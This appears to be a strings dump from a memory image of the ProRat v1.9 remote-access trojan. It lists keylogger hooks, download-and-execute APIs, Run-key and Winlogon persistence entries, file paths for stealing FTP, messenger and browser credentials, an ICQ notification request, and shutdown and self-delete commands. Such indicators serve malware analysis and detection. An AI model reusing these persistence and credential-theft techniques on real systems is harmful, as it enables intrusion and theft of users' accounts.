@Ftpsrv@TFtpServer@CommandPASS$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandPASV$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandPORT$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandPWD$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandQUIT$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandREST$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandRETR$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandRMD$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandRNFR$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandRNTO$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandSIZE$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandSTOR$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandSTRU$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandSYST$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandTYPE$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandUSER$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandXPWD$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@DisconnectAll$qqrv
@Ftpsrv@TFtpServer@GetActive$qqrv
@Ftpsrv@TFtpServer@GetClientCount$qqrv
@Ftpsrv@TFtpServer@Notification$qqrp18Classes@TComponent18Classes@TOperation
@Ftpsrv@TFtpServer@SendAnswer$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%
@Ftpsrv@TFtpServer@SendNextDataChunk$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocket
@Ftpsrv@TFtpServer@ServSocketSessionAvailable$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ServSocketStateChange$qqrp14System@TObject20Wsocket@TSocketStatet2
@Ftpsrv@TFtpServer@SetActive$qqro
@Ftpsrv@TFtpServer@Start$qqrv
@Ftpsrv@TFtpServer@StartSendData$qqrp22Ftpsrvc@TFtpCtrlSocket
@Ftpsrv@TFtpServer@Stop$qqrv
@Ftpsrv@TFtpServer@TriggerAlterDirectory$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%o
@Ftpsrv@TFtpServer@TriggerAuthenticate$qqrp22Ftpsrvc@TFtpCtrlSocket17System@AnsiStringt2ro
@Ftpsrv@TFtpServer@TriggerBuildDirectory$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%o
@Ftpsrv@TFtpServer@TriggerChangeDirectory$qqrp22Ftpsrvc@TFtpCtrlSocket17System@AnsiStringro
@Ftpsrv@TFtpServer@TriggerClientCommand$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@TriggerClientConnect$qqrp22Ftpsrvc@TFtpCtrlSocketus
@Ftpsrv@TFtpServer@TriggerClientDisconnect$qqrp22Ftpsrvc@TFtpCtrlSocketus
@Ftpsrv@TFtpServer@TriggerMakeDirectory$qqrp22Ftpsrvc@TFtpCtrlSocket17System@AnsiStringro
@Ftpsrv@TFtpServer@TriggerRetrDataSent$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketus
@Ftpsrv@TFtpServer@TriggerRetrSessionClosed$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketus
@Ftpsrv@TFtpServer@TriggerRetrSessionConnected$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketus
@Ftpsrv@TFtpServer@TriggerSendAnswer$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%
@Ftpsrv@TFtpServer@TriggerServerStart$qqrv
@Ftpsrv@TFtpServer@TriggerServerStop$qqrv
@Ftpsrv@TFtpServer@TriggerStorDataAvailable$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketpcius
@Ftpsrv@TFtpServer@TriggerStorSessionClosed$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketus
@Ftpsrv@TFtpServer@TriggerStorSessionConnected$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketus
@Ftpsrv@TFtpServer@TriggerValidateDele$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%ro
@Ftpsrv@TFtpServer@TriggerValidateGet$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%ro
@Ftpsrv@TFtpServer@TriggerValidatePut$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%ro
@Ftpsrv@TFtpServer@TriggerValidateRnFr$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%ro
@Ftpsrv@TFtpServer@TriggerValidateRnTo$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%ro
@Ftpsrv@TFtpServer@WMFtpSrvAbortTransfer$qqrr17Messages@TMessage
@Ftpsrv@TFtpServer@WMFtpSrvClientClosed$qqrr17Messages@TMessage
@Ftpsrv@TFtpServer@WMFtpSrvCloseData$qqrr17Messages@TMessage
@Ftpsrv@TFtpServer@WMFtpSrvCloseRequest$qqrr17Messages@TMessage
@Ftpsrv@TFtpServer@WndProc$qqrr17Messages@TMessage
@Ftpsrv@initialization$qqrv
@Ftpsrvc@CopyRight
@Ftpsrvc@EFtpCtrlSocketException@
@Ftpsrvc@Finalization$qqrv
@Ftpsrvc@IsUNC$qqr17System@AnsiString
@Ftpsrvc@PatchIE5$qqrr17System@AnsiString
@Ftpsrvc@TFtpCtrlSocket@
@Ftpsrvc@TFtpCtrlSocket@$bctr$qqrp18Classes@TComponent
@Ftpsrvc@TFtpCtrlSocket@$bdtr$qqrv
@Ftpsrvc@TFtpCtrlSocket@Dup$qqri
@Ftpsrvc@TFtpCtrlSocket@GetPeerAddr$qqrv
@Ftpsrvc@TFtpCtrlSocket@SendAnswer$qqr17System@AnsiString
@Ftpsrvc@TFtpCtrlSocket@SetAbortingTransfer$qqro
@Ftpsrvc@TFtpCtrlSocket@SetDirectory$qqr17System@AnsiString
@Ftpsrvc@TFtpCtrlSocket@SetRcvSize$qqri
@Ftpsrvc@TFtpCtrlSocket@StartConnection$qqrv
@Ftpsrvc@TFtpCtrlSocket@TriggerCommand$qqrpci
@Ftpsrvc@TFtpCtrlSocket@TriggerDataAvailable$qqrus
@Ftpsrvc@TFtpCtrlSocket@TriggerSessionConnected$qqrus
@Ftpsrvc@initialization$qqrv
@Ftpsrvt@CopyRight
@Ftpsrvt@FileUtcStr$qqr17System@AnsiString
@Ftpsrvt@Finalization$qqrv
@Ftpsrvt@initialization$qqrv
@Smtpprot@CopyRight
@Smtpprot@Finalization$qqrv
@Smtpprot@Register$qqrv
@Smtpprot@Rfc822DateTime$qqr16System@TDateTime
@Smtpprot@SmtpException@
@Smtpprot@TCustomSmtpClient@
@Smtpprot@TCustomSmtpClient@$bctr$qqrp18Classes@TComponent
@Smtpprot@TCustomSmtpClient@$bdtr$qqrv
@Smtpprot@TCustomSmtpClient@Abort$qqrv
@Smtpprot@TCustomSmtpClient@CheckReady$qqrv
@Smtpprot@TCustomSmtpClient@ClearErrorMessage$qqrv
@Smtpprot@TCustomSmtpClient@Connect$qqrv
@Smtpprot@TCustomSmtpClient@Data$qqrv
@Smtpprot@TCustomSmtpClient@DataNext$qqrv
@Smtpprot@TCustomSmtpClient@DisplayLastResponse$qqrv
@Smtpprot@TCustomSmtpClient@DoHighLevelAsync$qqrv
@Smtpprot@TCustomSmtpClient@DoUUEncode$qqrrpvr17System@AnsiStringro
@Smtpprot@TCustomSmtpClient@EndUUEncode$qqrrpv
@Smtpprot@TCustomSmtpClient@ExecAsync$qqr21Smtpprot@TSmtpRequest17System@AnsiStringpxusxiynpqqrv$v
@Smtpprot@TCustomSmtpClient@Helo$qqrv
@Smtpprot@TCustomSmtpClient@HighLevelAsync$qqr21Smtpprot@TSmtpRequest45System@%Set$t17Smtpprot@TSmtpFct$iuc$0$iuc$8%
@Smtpprot@TCustomSmtpClient@InitUUEncode$qqrrpv17System@AnsiString
@Smtpprot@TCustomSmtpClient@Mail$qqrv
@Smtpprot@TCustomSmtpClient@MailFrom$qqrv
@Smtpprot@TCustomSmtpClient@NextExecAsync$qqrv
@Smtpprot@TCustomSmtpClient@Open$qqrv
@Smtpprot@TCustomSmtpClient@Quit$qqrv
@Smtpprot@TCustomSmtpClient@RcptTo$qqrv
@Smtpprot@TCustomSmtpClient@RcptToDone$qqrv
@Smtpprot@TCustomSmtpClient@RcptToNext$qqrv
@Smtpprot@TCustomSmtpClient@Rset$qqrv
@Smtpprot@TCustomSmtpClient@SendCommand$qqr17System@AnsiString
@Smtpprot@TCustomSmtpClient@SetContentType$qqr25Smtpprot@TSmtpContentType
@Smtpprot@TCustomSmtpClient@SetErrorMessage$qqrv
@Smtpprot@TCustomSmtpClient@SetMailMessage$qqrp16Classes@TStrings
@Smtpprot@TCustomSmtpClient@SetRcptName$qqrp16Classes@TStrings
@Smtpprot@TCustomSmtpClient@StateChange$qqr19Smtpprot@TSmtpState
@Smtpprot@TCustomSmtpClient@TriggerCommand$qqr17System@AnsiString
@Smtpprot@TCustomSmtpClient@TriggerDisplay$qqr17System@AnsiString
@Smtpprot@TCustomSmtpClient@TriggerGetData$qqripciro
@Smtpprot@TCustomSmtpClient@TriggerHeaderLine$qqrpci
@Smtpprot@TCustomSmtpClient@TriggerProcessHeader$qqrp16Classes@TStrings
@Smtpprot@TCustomSmtpClient@TriggerRequestDone$qqrus
@Smtpprot@TCustomSmtpClient@TriggerResponse$qqr17System@AnsiString
@Smtpprot@TCustomSmtpClient@TriggerSessionClosed$qqrus
@Smtpprot@TCustomSmtpClient@TriggerSessionConnected$qqrus
@Smtpprot@TCustomSmtpClient@TriggerStateChange$qqrv
@Smtpprot@TCustomSmtpClient@Vrfy$qqrv
@Smtpprot@TCustomSmtpClient@WMSmtpRequestDone$qqrr17Messages@TMessage
@Smtpprot@TCustomSmtpClient@WSocketDataAvailable$qqrp14System@TObjectus
@Smtpprot@TCustomSmtpClient@WSocketDataSent$qqrp14System@TObjectus
@Smtpprot@TCustomSmtpClient@WSocketDnsLookupDone$qqrp14System@TObjectus
@Smtpprot@TCustomSmtpClient@WSocketSessionClosed$qqrp14System@TObjectus
@Smtpprot@TCustomSmtpClient@WSocketSessionConnected$qqrp14System@TObjectus
@Smtpprot@TCustomSmtpClient@WndProc$qqrr17Messages@TMessage
@Smtpprot@TSmtpCli@
@Smtpprot@TSmtpCli@$bctr$qqrp18Classes@TComponent
@Smtpprot@TSmtpCli@$bdtr$qqrv
@Smtpprot@TSmtpCli@Data$qqrv
@Smtpprot@TSmtpCli@PrepareEMail$qqrv
@Smtpprot@TSmtpCli@SetEMailFiles$qqrp16Classes@TStrings
@Smtpprot@TSmtpCli@TriggerAttachContentType$qqrir17System@AnsiStringt2
@Smtpprot@TSmtpCli@TriggerAttachHeader$qqri17System@AnsiStringp16Classes@TStrings
@Smtpprot@TSmtpCli@TriggerGetData$qqripciro
@Smtpprot@TSmtpCli@TriggerHeaderLine$qqrpci
@Smtpprot@TSyncSmtpCli@
@Smtpprot@TSyncSmtpCli@$bctr$qqrp18Classes@TComponent
@Smtpprot@TSyncSmtpCli@AbortSync$qqrv
@Smtpprot@TSyncSmtpCli@ConnectSync$qqrv
@Smtpprot@TSyncSmtpCli@DataSync$qqrv
@Smtpprot@TSyncSmtpCli@HeloSync$qqrv
@Smtpprot@TSyncSmtpCli@MailFromSync$qqrv
@Smtpprot@TSyncSmtpCli@MailSync$qqrv
@Smtpprot@TSyncSmtpCli@OpenSync$qqrv
@Smtpprot@TSyncSmtpCli@QuitSync$qqrv
@Smtpprot@TSyncSmtpCli@RcptToSync$qqrv
@Smtpprot@TSyncSmtpCli@RsetSync$qqrv
@Smtpprot@TSyncSmtpCli@Synchronize$qqrynpqqrv$v
@Smtpprot@TSyncSmtpCli@VrfySync$qqrv
@Smtpprot@TSyncSmtpCli@WaitUntilReady$qqrv
@Smtpprot@initialization$qqrv
@Wsocket@TCustomSocksWSocket@SetSocksPort$qqr17System@AnsiString
@Wsocket@TCustomWSocket@GetPeerPort$qqrv
@Wsocket@TCustomWSocket@GetRemotePort$qqrv
@Wsocket@TCustomWSocket@GetXPort$qqrv
@Wsocket@TCustomWSocket@Notification$qqrp18Classes@TComponent18Classes@TOperation
@Wsocket@TCustomWSocket@SetLocalPort$qqr17System@AnsiString
@Wsocket@TCustomWSocket@SetRemotePort$qqr17System@AnsiString
@Wsocket@WSocketResolvePort$qqr17System@AnsiStringt1
Font.Charset
Font.Color
Font.Height
Font.Name
Font.Style
220 Welcom to ProRat Ftp Server
WindowState
CreatePipe
GetProcessHeap
WinExec
RegCloseKey
RegCreateKeyExA
RegDeleteKeyA
RegEnumKeyExA
RegFlushKey
RegOpenKeyExA
RegQueryInfoKeyA
SetViewportOrgEx
ShellExecuteA
URLDownloadToFileA
ActivateKeyboardLayout
EnumThreadWindows
EnumWindows
ExitWindowsEx
GetKeyNameTextA
GetKeyState
GetKeyboardLayout
GetKeyboardLayoutList
GetKeyboardType
LoadKeyboardLayoutA
MapVirtualKeyA
MsgWaitForMultipleObjects
keybd_event
`.data
P.idata
@.edata
@.rsrc
@.reloc
KERNEL32.DLL
ADVAPI32.DLL
AVICAP32.DLL
COMCTL32.DLL
GDI32.DLL
OLE32.DLL
OLEAUT32.DLL
SHELL32.DLL
URLMON.DLL
WINMM.DLL
WINSPOOL.DRV
WS2_32.DLL
WSOCK32.DLL
JPEG error #%d

services.exe_3188_rwx_00401000_001F9000:




Port
LocalPort
PeerPort
SocksPort
SocksPassword
wsock32.dll
Unable to load wsock32.dll Error #
%s: WSAStartup error #%d
0.0.0.0
Cannot change Port if not closed
Cannot change LocalPort if not closed
255.255.255.255
WSocketResolveHost: Cannot convert host address '%s', Error #%d
WSocketResolvePort: Invalid Port.
WSocketResolvePort: Cannot convert port '%s', Error #%d
WSocketResolveProto: Cannot convert protocol '%s', Error #%d
GetPeerPort
%s: can't start DNS lookup, error #%d
winsock.bind failed, error #%d
winsock.getsockname failed, error #%d
Connect: No Port Specified
listen: port not assigned
Winsock.GetHostName failed
Operation would block
Operation now in progress
Operation already in progress
Socket operation on non-socket
Protocol not supported
Socket type not supported
Operation not supported on socket
Protocol family not supported
Address family not supported by protocol family
WinSock DLL cannot support this application
Can't change socks port if not closed
Listening is not supported thru socks server
tcp is the only protocol supported thru socks server
Uh.xC
0.0.0.1
command not supported
address type not supported
TFtpString
TFtpServer (c) 1998-2000 F. Piette V1.08
FtpServerException
FtpSrv
TFtpSrvAuthenticateEvent
TFtpCtrlSocket
Password
TFtpSrvChangeDirectoryEvent
TFtpSrvBuildDirectoryEvent
TFtpSrvClientConnectEvent
TFtpSrvDataSessionConnectedEvent
TFtpSrvClientCommandEvent
Keyword
TFtpSrvAnswerToClientEvent
TFtpString@
TFtpSrvValidateXferEvent
TFtpSrvDataAvailableEvent
TFtpSrvRetrDataSentEvent
TFtpSrvCommandProc
TFtpSrvCommandTableItem
TFtpServer
220 ICS FTP Server ready.
PORT
500 '%s': command not understood.
331 Password required for %s.
503 Login with USER first.
230 User %s logged in.
530 Login incorrect.
$530 Please login with USER and PASS.
250 CWD command successful. "%s" is current directory.
501 CWD failed. %s
257 "%s" is current directory.
200 Port command successful.
501 Invalid PORT command.
150 Opening data connection for %s.
501 Cannot STOR. %s
ftp-data
426 Connection closed; %s.
426 Connection closed; transfer aborted. Error #%d
501 Cannot RETR. %s
451 Failed: %s.
1 ftp ftp
%s %2.2d
200 Type set to %s.
500 'TYPE %s': command not understood.
250 File '%s' deleted.
450 File '%s' can't be deleted.
550 '%s': no such file or directory.
213 %d
550 Command failed: %s.
350 REST supported. Ready to resume at byte offset %d.
501 Syntax error in parameter: %s.
553 '%s': file already exists.
250 File '%s' renamed to '%s'.
450 File '%s' can't be renamed.
200 Ok. Parameter was '%s'.
550 '%s': can't create directory.
550 '%s': file or directory already exists.
257 '%s': directory created.
150 APPE supported. Ready to append file "%s" at offset %d.
200 Ok. STRU parameter '%s' ignored.
550 '%s': no such directory.
250 '%s': directory removed.
550 '%s': can't remove directory.
227 Entering Passive Mode (127,0,0,1,%d,%d).
227 Entering Passive Mode (%d,%d,%d,%d,%d,%d).
500 PASV exception: '%s'.
213 %s
550 %s
SMTP component (c) 1997-2000 F. Piette V2.17
SmtpException
SmtpProt
TSmtpState
smtpReady
smtpDnsLookup
smtpConnecting
smtpConnected
smtpInternalReady
smtpWaitingBanner
smtpWaitingResponse
smtpAbort
TSmtpRequest
smtpConnect
smtpHelo
smtpMailFrom
smtpVrfy
smtpRcptTo
smtpData
smtpQuit
smtpRset
smtpOpen
smtpMail
smtpCustom
TSmtpFct
smtpFctNone
smtpFctHelo
smtpFctConnect
smtpFctMailFrom
smtpFctRcptTo
smtpFctData
smtpFctVrfy
smtpFctQuit
smtpFctRset
TSmtpFctSet
TSmtpContentType
smtpHTML
smtpPlainText
TSmtpDisplay
TSmtpHeaderLineEvent
TSmtpProcessHeaderEvent
TSmtpGetDataEvent
MsgLine
TSmtpRequestDone
TSmtpAttachmentContentType
TSmtpAttachHeader
TSmtpNextProc
TCustomSmtpClient
TSmtpCli
TSmtpClid
OnProcessHeader8
TSyncSmtpCli
smtp
SMTP component not ready
SMTP component not connected
SMTP component already connected
426 Operation aborted.
FtpSrvT (c) 1999-2000 F. Piette V1.02
TFtpCtrlSocket (c) 1998-2000 F. Piette V1.06
EFtpCtrlSocketException`_D
EFtpCtrlSocketExceptionD_D
FtpSrvC
TFtpCtrlState
ftpcInvalid
ftpcWaitingUserCode
ftpcWaitingPassword
ftpcReady
ftpcWaitingAnswer
TFtpCmdType
ftpcPORT
ftpcSTOR
ftpcRETR
ftpcCWD
ftpcXPWD
ftpcPWD
ftpcUSER
ftpcPASS
ftpcLIST
ftpcRMD
ftpcTYPE
ftpcSYST
ftpcQUIT
ftpcDELE
ftpcRNFR
ftpcMKD
ftpcRNTO
ftpcNOOP
ftpcNLST
ftpcABOR
ftpcCDUP
ftpcSIZE
ftpcREST
ftpcAPPE
ftpcSTRU
ftpcMDTM
TFtpOption
ftpcUNC
TFtpOptions
CmdBuf
CmdLen
FtpState
PassWordT
220-ICS FTP Server ready
ssHorizontal
OnKeyDown
OnKeyPress
OnKeyUp
windows
AutoHotkeysd2E
AutoHotkeys
:].tJ
EInvalidGraphicOperation
KeyPreview
WindowStated4E
ssHotTrack
TWindowState
poProportional
TWMKey
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
TDragOperation
TKeyEvent
TKeyPressEvent
crSQLWait
%s (%s)
IMM32.DLL
EInvalidOperation
%s[%d]
%s_%d
USER32.DLL
comctl32.dll
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
kernel32.dll
Portions Copyright (c) 1983,99 Borland
%u8F3
iphlpapi.dll
user32.dll
The procedure entry point %s could not be located in the dynamic link library %s
The ordinal %u could not be located in the dynamic link library %s
advapi32.dll
shell32.dll
.text
.rdata
.data
.rsrc
.reloc
.aspack
.adata
>%U:f{
MFC42.DLL
MSVCRT.dll
GetWindowsDirectoryA
KERNEL32.dll
GetKeyboardState
SetWindowsHookExA
UnhookWindowsHookEx
USER32.dll
hodll.dll
mfc42.dll
msvcrt.dll
`.rdata
@.data
.HookSec
B[ ProRat v1.9 Trojan Horse - Coded by PRO Group - Made in Turkey ]
GetCPInfo
TESTDLL.dll
RegEnumKeyW
Advapi32.dll
NTDLL.DLL
Windows services
{5Y99AE78-58TT-11dW-BE53-Y67078979Y}
0'04090?0
TCP[R[P;PMP
TCMD@TG;PMP
SFTC &úWLW;PMP
CESB&%F;PMP
151.164.23.201
aku.edu.tr
atauni.edu.tr
ege.edu.tr
ankara.edu.tr
192.168.0.1
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_CURRENT_CONFIG
cuteftp
Login :
Password :
Pass :
SOFTWARE\Microsoft\Windows\CurrentVersion
%Program Files%
\GlobalSCAPE\CuteFTP\sm.dat
\GlobalSCAPE\CuteFTP\smdata.dat
\CuteFTP\tree.dat
\CuteFTP\smdata.dat
\GlobalSCAPE\CuteFTP Pro\sm.dat
\GlobalSCAPE\CuteFTP\5.0\sm.dat
\GlobalSCAPE\CuteFTP Pro\2.0\sm.dat
\GlobalSCAPE\CuteFTP Pro\3.0\sm.dat
\GlobalSCAPE\CuteFTP Pro\6.0\sm.dat
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings
\RSACi.rat
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\.Default
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\.Default\hXXp://VVV.rsac.org/ratingsv01.html
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules\.Default
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules\.Default\0
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules\.Default\0\PRPolicy
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules\.Default\0\PRPolicy\
PRNumURLExpressions
PRBUPort
PRBUUrl
Sites.dat
Password :
Port :
Tport_atm=0
\reg_ent.reg
regedit.exe /s
\winrar.exe
Microsoft Windows NT
Microsoft Windows 2000
Microsoft Windows XP
Microsoft Windows 95
Microsoft Windows 98
Microsoft Windows Me
\Software\Microsoft\Windows NT Script Host\Microsoft DxDiag\WinSettings\
d_.exe
winoa386.mod
\scrpt.bat
\scrpt.vbs
\winkey.dll
\reginv.dll
127.0.0.1
.jpeg
\win.ini
\system.ini
Explorer.exe
del %c%s%c
if exist %c%s%c goto 1
del À
\system32\fservice.exe
\system\sservice.exe
\mps.atm
\kdd32.atm
\system32\winkey.dll
\system\winkey.dll
\system32\wininv.dll
\system\wininv.dll
SOFTWARE\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}
SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\
Windows
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\
Explorer.exe
SOFTWARE\Microsoft\Windows NT Script Host\Microsoft DxDiag
GET /friendship/email_thank_you.php?folder_id=18984¶ms_count=0&nick_name=Pro_Rat&user_email=Pro_Rat@yahoo.com&user_uin=&friend_nickname=&friend_contact=
&friend_nickname2=&friend_contact2=&x=60&y=15 HTTP/1.1
Referer: hXXp://VVV.icq.com/friendship/pages/send_by_email_18984.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.icq.com
Software\Microsoft\Windows\CurrentVersion\Policies\System
c:\autoexec.bat
\p_ekran.jpg
services.exe
msn.ini
yahoo.ini
Windows Ver :
Windows Language :
Windows Path :
software\microsoft\windows\currentversion
VVV.icq.com
Port :
Password :
Microsoft Outlook Express 6.00.2800.1158
\p_ekran.bmp
SOFTWARE\Microsoft\Windows NT Script Host\Microsoft DxDiag\WinSettings
Tport
Pplugin1.dll
Pplugin2.dll
Pplugin3.dll
Pplugin4.exe
Pplugin4.dat
Pplugin4.exe /stext
ktd32.atm
Pplugin8.exe
PpluginCd.dll
Pplugin9.dat
Pplugin8.exe /stext
Pplugin10xa.exe
Pplugin10xa.exe /stext
winp9.exe
winp9.exe /stext
eimsn.exe
winrar.exe
Software\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}
\services.exe
Windows services
Windows Logon Service
Online_List_atm=iuuq;..vvv/xntsrhud/bnl.bfh,cho.qsns`u/bfh
Port_atm=4001
SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run
SOFTWARE\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}\
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
shutdown.exe -s -t 00
shutdown.exe -r -t 00
shutdown.exe -l
\refresh.scf
CONTROL.EXE desk.cpl
CONTROL.EXE hdwwiz.cpl
CONTROL.EXE inetcpl.cpl
CONTROL.EXE appwiz.cpl
CONTROL.EXE intl.cpl
CONTROL.EXE joy.cpl
CONTROL.EXE access.cpl
CONTROL.EXE main.cpl
CONTROL.EXE ncpa.cpl
CONTROL.EXE nusrmgr.cpl
CONTROL.EXE timedate.cpl
CONTROL.EXE mmsys.cpl
CONTROL.EXE powercfg.cpl
CONTROL.EXE sysdm.cpl
CONTROL.EXE telephon.cpl
CONTROL.EXE odbccp32.cpl
\SOFTWARE\Microsoft\Internet Explorer\TypedURLs
////////// URL HISTORY //////////
url10
url11
url12
url13
url14
url15
url16
url17
url18
url19
url20
url21
url22
url23
url24
url25
00010pPassword Decrypt Error!
SMTP
\ICQ\Icq.exe
\Messenger\msmsgs.exe
\MSN Messenger\msnmsgr.exe
\Yahoo!\Messenger\YPager.exe
\Outlook Express\msimn.exe
\GlobalSCAPE\CuteFTP\cutftp32.exe
\NetMeeting\conf.exe
notepad.exe
mspaint.exe
wordpad.exe
calc.exe
\WinZip\WINZIP32.EXE
\WinRAR\WinRAR.exe
cmd.exe
command.com
\Internet Explorer\IEXPLORE.EXE
wmplayer.exe
\Winamp\winamp.exe
\Real\RealOne Player\realplay.exe
\QuickTime\QuickTimePlayer.exe
\Movie Maker\moviemk.exe
\FlashGet\flashget.exe
_ReadCdKeys
&serverportu=
HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
[email protected]
<[email protected]>
FtpServer1
FtpServer2
SmtpCli1
FtpServer1Authenticate
FtpServer2Authenticate
FormKeyDown
SmtpCli1RequestDone
FtpServer1ChangeDirectory
Memo2KeyDown
xxtype.cpp
derv->tpClass.tpcFlags & CF_HAS_BASES
Inappropriate I/O control operation
Broken pipe
Operation not permitted
%H:%M:%S
%m/%d/%y
%A, %B %d, %Y
d/d/d d:d:d.d
xx.cpp
varType->tpClass.tpcFlags & CF_HAS_DTOR
varType->tpClass.tpcDtorAddr
(errPtr->ERRcInitDtc >= varType->tpClass.tpcDtorCount) || flags
memType->tpClass.tpcFlags & CF_HAS_DTOR
varType->tpArr.tpaElemType->tpClass.tpcFlags & CF_HAS_DTOR
dttPtr->dttType->tpPtr.tppBaseType->tpClass.tpcFlags & CF_HAS_DTOR
IS_CLASS(dttPtr->dttType->tpMask) && (dttPtr->dttType->tpClass.tpcFlags & CF_HAS_DTOR)
elemType->tpClass.tpcFlags & CF_HAS_DTOR
C:\Windows\
Project1.exe
@$xp$16Ftpsrv@FtpSrv__3
@$xp$17Ftpsrv@TFtpServer
@$xp$17Ftpsrv@TFtpString
@$xp$17Smtpprot@TSmtpCli
@$xp$17Smtpprot@TSmtpFct
@$xp$18Ftpsrvc@TFtpOption
@$xp$19Ftpsrvc@TFtpCmdType
@$xp$19Ftpsrvc@TFtpOptions
@$xp$19Smtpprot@TSmtpState
@$xp$20Smtpprot@TSmtpFctSet
@$xp$21Ftpsrvc@TCommandEvent
@$xp$21Ftpsrvc@TDisplayEvent
@$xp$21Ftpsrvc@TFtpCtrlState
@$xp$21Smtpprot@TSmtpDisplay
@$xp$21Smtpprot@TSmtpRequest
@$xp$21Smtpprot@TSyncSmtpCli
@$xp$22Ftpsrvc@TFtpCtrlSocket
@$xp$22Smtpprot@SmtpException
@$xp$22Smtpprot@TSmtpNextProc
@$xp$25Ftpsrv@FtpServerException
@$xp$25Ftpsrv@TFtpSrvCommandProc
@$xp$25Smtpprot@TSmtpContentType
@$xp$25Smtpprot@TSmtpRequestDone
@$xp$26Ftpsrv@TFtpCtrlSocketClass
@$xp$26Smtpprot@TCustomSmtpClient
@$xp$26Smtpprot@TSmtpAttachHeader
@$xp$26Smtpprot@TSmtpGetDataEvent
@$xp$29Smtpprot@TSmtpHeaderLineEvent
@$xp$30Ftpsrv@TFtpSrvCommandTableItem
@$xp$31Ftpsrv@TFtpSrvAuthenticateEvent
@$xp$31Ftpsrv@TFtpSrvRetrDataSentEvent
@$xp$31Ftpsrv@TFtpSrvValidateXferEvent
@$xp$31Ftpsrvc@EFtpCtrlSocketException
@$xp$32Ftpsrv@TFtpSrvClientCommandEvent
@$xp$32Ftpsrv@TFtpSrvClientConnectEvent
@$xp$32Ftpsrv@TFtpSrvDataAvailableEvent
